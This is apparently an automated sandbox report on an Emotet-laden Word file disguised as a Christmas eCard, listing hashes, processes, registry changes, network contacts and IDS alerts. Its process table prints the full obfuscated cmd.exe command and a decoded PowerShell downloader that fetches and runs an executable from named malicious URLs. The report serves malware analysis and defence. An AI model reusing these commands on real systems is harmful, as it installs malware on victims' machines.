| File name: | Christmas Greeting eCard.doc |
| Full analysis: | https://app.any.run/tasks/c2a0384c-9130-45a0-951a-dbbe3da2fffe |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | December 19, 2018, 02:13:21 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 10:58:00 2018, Last Saved Time/Date: Mon Dec 17 10:58:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 43, Security: 0 |
| MD5: | 09D389DC2E68CAA8B1087A212F6CEDE6 |
| SHA1: | 5FAA3F69B6A7D159CB8C1007345B284C96A598C2 |
| SHA256: | 85A080BEBE65F0F1B0AB42629CF8A49FADC9E1AC0B7559CB5A2E6BF74C70B2A5 |
| SSDEEP: | 1536:i7ljmW9/bvFYaMpsDq3dBOgbBcWQrS+a9:Il/bvFNMhbBcWQ |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:12:17 10:58:00 |
| ModifyDate: | 2018:12:17 10:58:00 |
| Pages: | 1 |
| Words: | 7 |
| Characters: | 43 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 49 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1348 | "C:\Users\admin\AppData\Local\Temp\682.exe" | C:\Users\admin\AppData\Local\Temp\682.exe | 682.exe | ||||||||||||
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 Modules
| |||||||||||||||
| 1540 | c:\MUijNfToFRIo\jbzsiqGSRj\nCMKAmdo\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set nMC=zjwlMbjnVGzanBJrPJNkcdOv:@uhS9yemDp';s =6UQ/}AIxW(\-0+.o17iHXt,fg{)$82Y3ZCF&&for %j in (67;41;32;10;39;35;48;12;55;35;36;67;5;6;3;39;12;31;2;51;55;5;6;31;20;61;38;18;31;61;54;48;31;5;73;3;58;31;12;61;36;67;72;2;58;39;35;27;61;61;34;24;43;43;37;61;15;58;19;31;71;34;15;55;21;26;20;61;58;55;12;37;54;20;55;32;43;63;59;60;21;59;37;31;55;52;25;27;61;61;34;24;43;43;6;55;32;6;55;32;37;61;26;21;58;55;54;20;55;32;43;33;61;47;8;3;28;26;25;27;61;61;34;24;43;43;26;3;26;37;27;11;5;31;15;54;20;55;32;43;52;70;70;42;19;47;26;70;56;25;27;61;61;34;24;43;43;21;15;11;34;11;15;61;54;55;15;64;43;32;30;73;32;47;28;9;29;25;27;61;61;34;24;43;43;5;58;3;3;63;15;58;61;10;6;15;54;20;55;32;43;10;72;45;60;29;11;57;29;52;17;35;54;28;34;3;58;61;49;35;25;35;66;36;67;42;23;28;39;35;37;61;3;35;36;67;60;23;9;38;39;38;35;40;68;69;35;36;67;4;74;17;39;35;72;4;72;35;36;67;6;70;21;39;67;31;12;23;24;61;31;32;34;53;35;50;35;53;67;60;23;9;53;35;54;31;47;31;35;36;63;55;15;31;11;20;27;49;67;48;63;48;38;58;12;38;67;72;2;58;66;65;61;15;30;65;67;5;6;3;54;33;55;2;12;3;55;11;21;74;58;3;31;49;67;48;63;48;62;38;67;6;70;21;66;36;67;60;20;46;39;35;41;3;21;35;36;46;63;38;49;49;9;31;61;51;46;61;31;32;38;67;6;70;21;66;54;3;31;12;64;61;27;38;51;64;31;38;68;52;52;52;52;66;38;65;46;12;23;55;19;31;51;46;61;31;32;38;67;6;70;21;36;67;2;32;34;39;35;10;6;32;35;36;5;15;31;11;19;36;44;44;20;11;61;20;27;65;44;44;67;2;5;5;39;35;70;55;34;35;36;83)do set mzDP=!mzDP!!nMC:~%j,1!&&if %j gtr 82 powershell.exe "!mzDP:~-451!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2248 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 682.exe | |||||||||||
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 Modules
| |||||||||||||||
| 2424 | powershell.exe "$Umz='Wno';$bjl=new-object Net.WebClient;$Zwi='http://strike3productions.com/fHXdHseo0@http://jomjomstudio.com/DtxVlSu@http://ulushaber.com/0YYQkxuY1@http://drapart.org/myCmxSG9@http://billfritzjr.com/zZAX9a790J'.Split('@');$QvS='stl';$XvG = '682';$MFJ='ZMZ';$jYd=$env:temp+'\'+$XvG+'.exe';foreach($WfW in $Zwi){try{$bjl.DownloadFile($WfW, $jYd);$XcI='Uld';If ((Get-Item $jYd).length -ge 80000) {Invoke-Item $jYd;$wmp='zjm';break;}}catch{}}$wbb='Yop';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2624 | CmD /V:ON/C"set nMC=zjwlMbjnVGzanBJrPJNkcdOv:@uhS9yemDp';s =6UQ/}AIxW(\-0+.o17iHXt,fg{)$82Y3ZCF&&for %j in (67;41;32;10;39;35;48;12;55;35;36;67;5;6;3;39;12;31;2;51;55;5;6;31;20;61;38;18;31;61;54;48;31;5;73;3;58;31;12;61;36;67;72;2;58;39;35;27;61;61;34;24;43;43;37;61;15;58;19;31;71;34;15;55;21;26;20;61;58;55;12;37;54;20;55;32;43;63;59;60;21;59;37;31;55;52;25;27;61;61;34;24;43;43;6;55;32;6;55;32;37;61;26;21;58;55;54;20;55;32;43;33;61;47;8;3;28;26;25;27;61;61;34;24;43;43;26;3;26;37;27;11;5;31;15;54;20;55;32;43;52;70;70;42;19;47;26;70;56;25;27;61;61;34;24;43;43;21;15;11;34;11;15;61;54;55;15;64;43;32;30;73;32;47;28;9;29;25;27;61;61;34;24;43;43;5;58;3;3;63;15;58;61;10;6;15;54;20;55;32;43;10;72;45;60;29;11;57;29;52;17;35;54;28;34;3;58;61;49;35;25;35;66;36;67;42;23;28;39;35;37;61;3;35;36;67;60;23;9;38;39;38;35;40;68;69;35;36;67;4;74;17;39;35;72;4;72;35;36;67;6;70;21;39;67;31;12;23;24;61;31;32;34;53;35;50;35;53;67;60;23;9;53;35;54;31;47;31;35;36;63;55;15;31;11;20;27;49;67;48;63;48;38;58;12;38;67;72;2;58;66;65;61;15;30;65;67;5;6;3;54;33;55;2;12;3;55;11;21;74;58;3;31;49;67;48;63;48;62;38;67;6;70;21;66;36;67;60;20;46;39;35;41;3;21;35;36;46;63;38;49;49;9;31;61;51;46;61;31;32;38;67;6;70;21;66;54;3;31;12;64;61;27;38;51;64;31;38;68;52;52;52;52;66;38;65;46;12;23;55;19;31;51;46;61;31;32;38;67;6;70;21;36;67;2;32;34;39;35;10;6;32;35;36;5;15;31;11;19;36;44;44;20;11;61;20;27;65;44;44;67;2;5;5;39;35;70;55;34;35;36;83)do set mzDP=!mzDP!!nMC:~%j,1!&&if %j gtr 82 powershell.exe "!mzDP:~-451!"" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2796 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Christmas Greeting eCard.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2844 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | ||||||||||||
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 Modules
| |||||||||||||||
| 4028 | "C:\Users\admin\AppData\Local\Temp\682.exe" | C:\Users\admin\AppData\Local\Temp\682.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 Modules
| |||||||||||||||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | <&$ |
Value: 3C262400EC0A0000010000000000000000000000 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1301479454 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1301479568 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1301479569 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: EC0A00003C4692794097D40100000000 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | a'$ |
Value: 61272400EC0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | a'$ |
Value: 61272400EC0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2796) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR961C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE961D5.wmf | — | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7EB87AB.wmf | — | |
MD5:— | SHA256:— | |||
| 2424 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CG7T2REXQ4M6MUPMVUA7.temp | — | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ristmas Greeting eCard.doc | pgc | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFB92824.wmf | wmf | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:— | SHA256:— | |||
| 2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FA1D5D2.wmf | wmf | |
MD5:— | SHA256:— | |||
| 1348 | 682.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2844 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
2844 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
2424 | powershell.exe | GET | — | 103.27.201.8:80 | http://jomjomstudio.com/DtxVlSu/ | TH | — | — | malicious |
2844 | archivesymbol.exe | GET | — | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | — | — | malicious |
2424 | powershell.exe | GET | 301 | 134.0.10.197:80 | http://drapart.org/myCmxSG9 | ES | html | 236 b | malicious |
2424 | powershell.exe | GET | 301 | 103.27.201.8:80 | http://jomjomstudio.com/DtxVlSu | TH | html | 240 b | malicious |
2424 | powershell.exe | GET | 404 | 103.4.235.152:80 | http://strike3productions.com/fHXdHseo0 | AU | html | 326 b | malicious |
2424 | powershell.exe | GET | 200 | 134.0.10.197:80 | http://drapart.org/myCmxSG9/ | ES | executable | 124 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2424 | powershell.exe | 103.4.235.152:80 | strike3productions.com | TPG Telecom Limited | AU | malicious |
2424 | powershell.exe | 103.27.201.8:80 | jomjomstudio.com | Bangmod Enterprise Co., Ltd. | TH | malicious |
2844 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
2844 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
2844 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
2844 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
2424 | powershell.exe | 134.0.10.197:80 | drapart.org | 10dencehispahard, S.L. | ES | malicious |
2844 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
2844 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
|---|---|---|
strike3productions.com |
| malicious |
jomjomstudio.com |
| malicious |
ulushaber.com |
| malicious |
drapart.org |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
|---|---|---|---|
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2424 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2424 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2424 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2844 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |